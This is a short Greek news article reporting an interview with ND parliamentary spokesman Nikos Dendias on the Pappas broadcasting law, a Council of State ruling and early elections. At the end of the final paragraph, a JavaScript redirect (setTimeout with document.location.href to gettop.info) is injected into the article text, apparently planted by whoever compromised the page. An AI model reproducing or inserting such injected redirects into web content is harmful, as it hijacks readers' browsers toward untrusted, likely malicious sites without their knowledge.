Δένδιας: Η ΝΔ δεν ζητεί εκλογές από καπρίτσιο

0
9

 

«Ο δρόμος που επέλεξε η κυβέρνηση είναι ολισθηρός και θα την οδηγήσει σε αδιέξοδο», υποστηρίζει αναφερόμενος στον νόμο Παππά, ο κοινοβουλευτικός εκπρόσωπος της ΝΔ, Νίκος Δένδιας στη συνέντευξή του στο Αθηναϊκό-Μακεδονικό Πρακτορείο Ειδήσεων, υπογραμμίζοντας, επίσης, ότι η θέση της ΝΔ «πρώτα κατάργηση του νόμου και μετά σύσταση του ΕΣΡ» δεν είναι «εκβιασμός» και πως είναι υποχρέωση της κυβέρνησης η ικανοποίηση του αιτήματος για την κατάργηση ενός αντισυνταγματικού νομοθετήματος.

Ερωτηθείς για το «τι σημαίνει η απόφαση του ΣτΕ να κάνει δεκτές τις προσφυγές των καναλιών;», ο κοινοβουλευτικός εκπρόσωπος της ΝΔ, δηλώνει στο Αθηναϊκό-Μακεδονικό Πρακτορείο ότι σημαίνει «πως υπάρχουν δικαστές οι οποίοι αρνούνται να υποκύψουν σε πρωτόγνωρους εκβιασμούς».

Στην ερώτηση «αν υπάρχουν δύο γραμμές στη ΝΔ αναφορικά με τη σύσταση του ΕΣΡ» ο Νίκος Δένδιας απαντά ότι στη ΝΔ δεν υπάρχουν δύο γραμμές και υποστηρίζει ότι «η ηγεσία της ΝΔ θα αποφασίσει τι θα πράξει αναφορικά με τις ευθύνες της κυβέρνησης για συγκεκριμένες μεθοδεύσεις στο ζήτημα των τηλεοπτικών αδειών», αφήνοντας όλα τα σενάρια ανοικτά.

Μιλώντας για τις πρόωρες εκλογές ο Ν. Δένδιας υποστηρίζει ότι η ΝΔ δεν τις ζητά από «καπρίτσιο» καίτοι τη συμφέρει να μείνει ο ΣΥΡΙΖΑ στην εξουσία ώστε να καταρρεύσει σαν «ώριμο φρούτο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here